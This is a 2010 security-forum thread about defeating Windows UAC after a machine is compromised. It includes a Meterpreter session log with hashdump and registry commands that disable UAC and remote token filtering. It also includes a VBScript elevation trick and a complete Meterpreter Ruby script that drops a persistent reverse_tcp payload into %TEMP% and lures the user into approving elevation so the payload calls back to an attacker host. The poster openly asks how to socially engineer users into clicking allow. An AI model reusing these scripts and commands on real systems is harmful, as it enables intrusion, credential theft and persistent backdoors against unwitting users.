Results 1 to 6 of 6

Thread: how to disable UAC or user access control

  1. #1
    Member
    Join Date
    Feb 2010
    Location
    MTI3LjAuMC4x
    Posts
    90

    Default how to disable UAC or user access control

    this isnt anything crazy but it uses only metasploit scripts and no external sources which is cool.

    scripts used in this video
    Bash | # $Id: killuac.rb spudgunman $ # # Meterpreter s - Getcountermeasure v2 script

    http://www.backtrack-linux.org/forum...tml#post182720


    I also found this information later on after all this...
    http://www.pretentiousname.com/misc/...t2.html#videos
    Last edited by spudgunman; 12-05-2010 at 02:23 AM.

  2. #2
    Member
    Join Date
    Jun 2009
    Posts
    74

    Default Re: how to disable UAC or user access control

    I'm assuming that you own/operate the machine in question. If so, just turn it off. If not, you need a remote registry injection. The key you want is going to be EnableLUA (DWORD, value of 0 obviously) in HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentV ersionPoliciesSystem

  3. #3
    Member
    Join Date
    Feb 2010
    Location
    MTI3LjAuMC4x
    Posts
    90

    Default Re: how to disable UAC or user access control

    yea this is all lab work in VMware, and to help quantify that I am not a 100% nube my purpose for this is I just rebuilt the getcountermeasure script (http://www.backtrack-linux.org/forum...tml#post182720) and I want to try and improve it more to add functionality to disable UAC with my new rewrite of this script. and sure... it works if you manually turn it off but that defeats the purpose of my inquiry.

    you cant inject that key unless you have UAC disabled or elevated permissions so you cant change that key when UAC is enabled.

    so I am looking on how do you create a package that will socially engineer the user to click "allow on UAC" to inject that code and disable UAC or just install a msfservice as system for example with the same social exploit of clicking allow. (much like a software install would do) -- or is there any way to disable UAC with a script (I tried with a VB Script with sendkeys but turns out UAC will ignore sendkeys doh)
    Last edited by spudgunman; 12-01-2010 at 05:05 PM.

  4. #4
    Member
    Join Date
    Jun 2009
    Posts
    74

    Default Re: how to disable UAC or user access control

    Try this on for size:

    Bypassing UAC with User Privilege under Windows Vista/7 · Technology Articles

    The exploit was known as of 11/27, but I highly doubt it's been addressed and if it has, I suspect there are plenty of vulnerable systems still out there.

    If you want it to work for you for POC you will need to make sure that you have a vulnerable kernel (specifically win32k.sys).

  5. #5
    Member
    Join Date
    Feb 2010
    Location
    MTI3LjAuMC4x
    Posts
    90

    Default Re: how to disable UAC or user access control

    thanks will check that out now.. using VBS to elevate and install a backdoor gets me this effect.. damn UAC appears to be blocking even SYSTEM from having fun??! is this anyone elses experience?

    Code:
    meterpreter > sysinfo
    Computer: WIN-MSUB6TKFKFA
    OS      : Windows 7 (Build 7600, ).
    Arch    : x86
    Language: en_US
    meterpreter > getuid
    Server username: NT AUTHORITY\SYSTEM
    meterpreter > migrate 467
    
    meterpreter > hashdump
    just another way to do the same things this can be done a lot of ways...
    meterpreter > shell
    Process 268 created.
    Channel 10 created.
    Microsoft Windows [Version 6.1.7600]
    Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
    
    C:\Windows\system32>whoami
    whoami
    nt authority\system
    
    C:\Windows\system32>C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
    C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
    The operation completed successfully.
    update:
    after checking out that link.. interesting no need for the user to click "hack me please" I will check this out in more detail

    BTW my elevation script is as follows... the only down side is UAC asks if "wscript host" can have rights... suppose you could also do this with MSI or nullsoft installer
    Code:
    If WScript.Arguments.length =0 Then
      'rerun the script with elevated UAC and prevent a loop
      Set objShell = CreateObject("Shell.Application")
      objShell.ShellExecute WScript.FullName, WScript.ScriptFullName & " noloop", vbNullString, "runas"
    Else
      Set objShell = WScript.CreateObject("WScript.Shell")
      Set objFSO = CreateObject("Scripting.FileSystemObject")
      'locate the current path of the scrip
      strPath = Wscript.ScriptFullName
      Set objFile = objFSO.GetFile(strPath)
      strFolder = objFSO.GetParentFolderName(objFile)
      'script to run in elevated UAC here
      objShell.Run(strFolder & "\" & "backup.exe")
    End If

    after some thinking on this ...we then need to to patch UAC and reboot the box...
    again this is done any way.. just using DOS to keep it simple
    Code:
    C:\>whoami
    whoami
    nt authority\system
    
    C:\>C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
    C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
    The operation completed successfully.
    
    C:\>C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
    C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
    The operation completed successfully.
    
    C:\>shutdown /l /f
    shutdown /l /f
    
    C:\>[*] Meterpreter session 2 closed.  Reason: Died
    any thoughts on how to do (all of this) this better? (the attack not the reg edits.. I will eventually .rb script that stuff.
    Last edited by spudgunman; 12-04-2010 at 05:36 AM.

  6. #6
    Member
    Join Date
    Feb 2010
    Location
    MTI3LjAuMC4x
    Posts
    90

    Default Re: how to disable UAC or user access control

    to keep things clean here is the last post in a script

    Code:
    # $Id: killuac.rb spudgunman $
    #
    # Meterpreter script to prompt for permissions to run in elevated mode and then call home
    # some code pulled from the persistence.rb script
    # Script by Kelly Keeton<kellykeeton [at] hotmail>
    # Version: 0.5
    #
    # Default parameters
    #
    rhost = "192.168.254.129"
    rport = 31337
    payload = "windows/meterpreter/reverse_tcp"
    ##
    
    tempdir = client.fs.file.expand_path("%TEMP%")
    payloadfile = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".vbs"
    
    platform = client.platform.scan(/(win32|win64)/)
    unsupported if not platform
    
    print_status("Creating a payload to run elevated UAC: LHOST=#{rhost} LPORT=#{rport}")
    pay = client.framework.payloads.create("#{payload}")
    pay.datastore['LHOST'] = rhost
    pay.datastore['LPORT'] = rport
    raw  = pay.generate
    
    payloadvbs = ::Msf::Util::EXE.to_win32pe_vbs(client.framework, raw, {:persist => true, :delay => 5})
    print_status("Payload script is #{payloadvbs.length} bytes long")
    
    uacvbs = "
    If WScript.Arguments.length =0 Then
      Set objShell = CreateObject(\"Shell.Application\")
      objShell.ShellExecute WScript.FullName, WScript.ScriptFullName & \" noloop\", vbNullString, \"runas\"
    Else
      Set objShell = WScript.CreateObject(\"WScript.Shell\")
      Set objFSO = CreateObject(\"Scripting.FileSystemObject\")
      strPath = Wscript.ScriptFullName
      Set objFile = objFSO.GetFile(strPath)
      strFolder = objFSO.GetParentFolderName(objFile)
      tmp = \"wscript \" & Chr(34) & \"#{payloadfile}\" & Chr(34)
      objShell.Run(tmp)
    End If"
    #
    # Upload to the filesystem
    #
    elevationfile = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".vbs"
    print_status("UAC elevation script written to #{elevationfile}")
    fd = client.fs.file.new(elevationfile, "wb")
    fd.write(uacvbs)
    fd.close
    
    print_status("payload script written to #{payloadfile}")
    fd = client.fs.file.new(payloadfile, "wb")
    fd.write(payloadvbs)
    fd.close
    #
    # Execute the script
    #
    proc = session.sys.process.execute("wscript \"#{elevationfile}\"", nil, {'Hidden' => false})
    print_status("Script executed with PID #{proc.pid}")
    #EOF
    I also updated the getcountermeasure script to properly kill UAC on windows7 (didnt test vista)

    http://www.backtrack-linux.org/forum...tml#post182720



    MOD. can you move to experts (or wherever you see fit) as this is no longer a "im stuck thread"
    Last edited by spudgunman; 12-04-2010 at 08:27 AM.

Similar Threads

  1. Replies: 0
    Last Post: 07-11-2010, 10:22 AM
  2. Manipulating Windows limitied user access?
    By chris_heyward in forum Beginners Forum
    Replies: 3
    Last Post: 03-08-2010, 04:09 PM
  3. user access to switch
    By humbleman in forum OLD Newbie Area
    Replies: 32
    Last Post: 08-21-2009, 01:09 AM
  4. Access control for Hyper-V
    By GunMonkey in forum OLD General IT Discussion
    Replies: 0
    Last Post: 10-22-2008, 01:12 PM
  5. Cannot user startx with newly created user
    By imported_Zer0|Day in forum OLD BT3final Support
    Replies: 1
    Last Post: 06-25-2008, 01:28 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •